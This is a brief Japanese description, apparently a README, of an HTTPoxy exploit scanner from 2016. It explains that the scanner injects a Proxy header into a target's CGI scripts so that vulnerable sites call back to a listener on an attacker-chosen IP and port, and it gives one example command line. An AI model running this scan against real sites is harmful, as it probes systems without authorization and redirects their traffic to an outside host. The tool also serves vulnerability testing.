
HTTPoxy Exploit Scanner(1N3 @CrowdShield)
by 1N3 @CrowdShield (https://crowdshield.com) 最終更新日: 20160720
PoC/エクスプロイトスキャナで、対象URL上の一般的なCGIファイルをHTTPoxy脆弱性についてスキャンします。HttpoxyはCGIまたはCGIに似た環境で動作するアプリケーションコードに影響を与える一連の脆弱性です。詳細は https://httpoxy.org を参照してください。
リバースセッションを確立するためにncatが必要です。
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
これにより、一般的なCGIファイルのリストを使ってhttps://target.comをスキャンし、指定されたIP:PORTにProxyヘッダーを注入します。リバースリスナーが受信接続をキャッチし、リモートサイトが脆弱であることを確認します。
私はこのエクスプロイトの不正使用または誤用について一切の責任を負いません。